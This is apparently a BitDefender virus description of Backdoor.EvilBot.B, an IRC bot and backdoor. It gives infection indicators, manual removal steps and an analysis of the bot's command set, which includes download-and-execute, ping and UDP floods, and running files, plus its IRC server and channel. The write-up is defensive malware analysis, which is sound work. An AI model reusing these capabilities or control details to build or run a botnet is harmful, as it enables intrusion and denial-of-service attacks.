Presence of the msgrt.exe file in the Windows folder
Presence of the following registry key:
which points to the file msgrt.exe in the Windows folder
Suspicious connections to port 6667 of the server:
BitDefender can disinfect or delete automatically the files infected by this particular virus. The modified registry entries should be corrected manually.
- If you don't have BitDefender installed click here to download an evaluation version;
- Make sure that you have the latest updates using BitDefender Live!;
- Make the following changes in the windows registry:
Note: Please make sure to modify only the values that are specified. It is also recommended to backup the windows registry before proceeding with these changes. For more information on backing the registry please read the FAQ.
- Select Run... from Start, then type regedit and press Enter;
- Delete the following key:
- Reboot the computer
- Perform a full scan of your system (selecting, from the Action tab, the option Prompt user for action). Choose to delete all the files infected with Backdoor.EvilBot.B.
Mihai Chiriac BitDefender Virus Researcher
This is a minor modification of Backdoor.EvilBot.B
, which BitDefender detects since November 12th, 2002. This backdoor has two elements: an IRC bot
and the backdoor
itself. The IRC bot seems to be written in Romania; it takes girl names and joins busy Romanian channels, like #deva
The bot actually has the capability to “talk” to the user; it offers to send a picture (which of course is the backdoor).
When the backdoor is first executed, it fetches the address of the RegisterServiceProcess API
and uses it to register itself as a hidden task (under Windows 95/98
only); then it creates a registry key for itself so it’s automatically executed at every Windows startup.
After that, the Backdoor connect to port 6667
(IRC) of the server eu.undernet.org
, generates a random nickname and joins the channel #ucica
. This channel is marked secret and to join this channel an user must have a special key.
The commands can be sent either by private message to a single user, or a message in the channel (those commands will be executed by all users). Available commands:
upd – updates the bot; this command always fails because the backdoor attempts to update itself from update.ur.address/thepath.exe; this address obviously doesn’t exist.
down – downloads a file from the web and execute it;
nick – changes the nick;
p1, p2, p3, p4 – floods an internet address (by ping commands);
msg – sends a trivial message to an user;
udp – UDP floods an internet address;
s – executes a file;
l – parts a channel;
j – joins a channel;
r – specify to an user a string like evilbot ready for attack...;
pwX – makes the users quit the channel and terminates the backdoor process; however, the file remains on disk and the registry entry is still there. On the next reboot, the backdoor will executed again.